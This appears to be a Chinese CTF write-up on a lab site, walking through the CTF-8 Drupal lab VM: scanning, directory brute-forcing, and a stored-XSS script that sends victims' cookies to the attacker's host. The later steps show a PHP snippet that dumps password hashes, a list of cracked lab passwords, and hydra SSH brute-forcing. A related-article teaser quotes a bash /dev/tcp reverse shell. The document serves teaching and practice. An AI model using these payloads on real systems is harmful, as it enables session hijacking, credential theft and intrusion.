CTF-8 靶场夺旗

2024-02-07 15:40
文章标签 靶场 ctf 夺旗

本文主要是介绍CTF-8 靶场夺旗,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

兵无常势,水无常形,能因敌而致胜者,谓之神

环境准备

VMware Workstation Pro12
Kali Linux (IP10.10.16.128CTF-8 虚拟机
NAT 网络连接

1. 主机发现

fping -asg 10.10.16.0/24

在这里插入图片描述
访问靶机 http://10.10.16.138
在这里插入图片描述
查看源代码,发现 flag
在这里插入图片描述

2. 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.138

在这里插入图片描述

3. 目录爆破

dirb http://10.10.16.138

在这里插入图片描述
所有用户都有一个ID(第一个是管理)。

http://10.10.16.138/user/1

在这里插入图片描述
所有页面都有一个ID(隐藏页有28个),访问第28个得到 flag

http://10.10.16.138/node/28

在这里插入图片描述
访问 robot.txt 和 phpinfo.php 分别得到两个 flag 。
在这里插入图片描述
在这里插入图片描述
浏览页面之后有一个 content 目录没能被扫出来,于是使用 dirb 再对目录爆破一遍,发现一个 hidden 文件,访问之后发现和前面 http://10.10.16.138/node/28 是同样的页面

dirb http://10.10.16.138/content

在这里插入图片描述

4. 漏洞挖掘

在首页文章下面的评论区插入 XSS 测试代码,再次访问这篇文章的时候就会触发 XSS 代码,出现如下弹框,说明此处存在 XSS 漏洞。
在这里插入图片描述
在这里插入图片描述

5. 漏洞利用

注册一个账户 zhutou ,然后以注册的账户登录,在评论区插入如下代码

<script>
var request=new XMLHttpRequest();
var redirect_url="http://10.10.16.128:4444/"+document.cookie;
request.open("GET",redirect_url);
request.send();
</script>

在这里插入图片描述
该脚本旨在获取访问该文章的用户的 session_id ,特别是本文作者 Barbara 的 session_id,所以,关键的一步还是要给作者留言,让他再次去访问这篇文章
在这里插入图片描述
在 Kali 快速搭建一个 http 服务,提供一个文件浏览的 web 服务(ctrl+c 关闭,不要使用 ctrl+z,那是停止,还没关闭端口,如果下次使用就会报错,提示端口被占用)
在这里插入图片描述
10.10.16.138 那一行就是 admin 的访问记录,带上管理员的 cookie 访问首页,发现用户变成了 steve
在这里插入图片描述
之后左上角选择再添加文章,在 Body 处添加如下脚本。

<?php
$result = db_query('select name,pass from users');
while($record = db_fetch_object($result))
{
print $record->name . ":" . $record->pass . "<br/>";
}
?>

在这里插入图片描述
关键的一步是在 input format 中选择 PHP code
在这里插入图片描述
同样,每操作一步都要使用 Steve 的 cookie ,不然会自动换成普通用户的 cookie。
在这里插入图片描述
在这里插入图片描述
密码重复使用是当今一个经常出现的问题。如果我们能破解这些散列我们可以重新使用相同的密码来获得对目标系统的 shell 访问。Drupal 使用 MD5 算法保存密码散列,该算法不是很强。我们也许可以使用暴力强制这些散列或使用字典查找某些值。

john -w=/usr/share/wordlists/rockyou.txt -form=raw-md5 zhutou.txt 

在这里插入图片描述
在这里插入图片描述
一个个去线上破解

admin:49265c16d1dff8acef3499bd889299d6(football123)
Barbara:bed128365216c019988915ed3add75fb(passw0rd)
Jim:2a5de0f53b1317f7e36afcdb6b5202a4(letmein!)
Steve:08d15a4aef553492d8971cdd5198f314(drupal)
Sherry:c3319d1016a802db86653bcfab871f4f(1website)
Gene:9b9e4bbd988954028a44710a50982576
Harvey:7d29975b78825ea7c27f5c0281ea2fa4
John:518462cd3292a67c755521c1fb50c909(4summer13)
Johnathan:6dc523ebd2379d96cc0af32e2d224db0(1loveU)
Susan:0d42223010b69cab86634bc359ed870b(BobMarley)
Dan:8f75ad3f04fc42f07c95e2f3d0ec3503(BaseballSeason)
George:ed2b1f468c5f915f3f1cf75d7068baae(12341234)
Jeff:ca594f739e257245f2be69eb546c1c04(sitepass)
Stacey:85aca385eb555fb6a36a62915ddd8bc7(Seventy70)
Juan:573152cc51de19df50e90b0e557db7fe(swanson)
Michael:c7a4476fc64b75ead800da9ea2b7d072(cherry)
Jerome:42248d4cb640a3fb5836571e254aee2b
Tom:971dcf53e88e9268714d9d504753d347(drupalpassword)
Xavier:3005d829eb819341357bfddf541c175b(thundercats)
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2(fantasy)
zhutou:a6b3342afdf0d87ce6d2ae8af29069e7

将以上的用户名对应的账号和密码分别保存在文本里。根据前面提到的,每一个用户在 user 目录下对应一个 ID ,用户名对应的账号查找如下:
在这里插入图片描述
使用 hydra(九头蛇)/medusa(美杜莎)进行 ssh 登录爆破。

hydra -L user.txt -P passwd.txt -t 10 ssh://10.10.16.138

在这里插入图片描述
使用第一个帐密登录得到两个 flag 并成功提权。
在这里插入图片描述
进入家目录,查看其他用户,在其他用户目录下都发现了 flag 。
在这里插入图片描述

                                                                                                                        猪头 2020.2.23

这篇关于CTF-8 靶场夺旗的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/688173

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik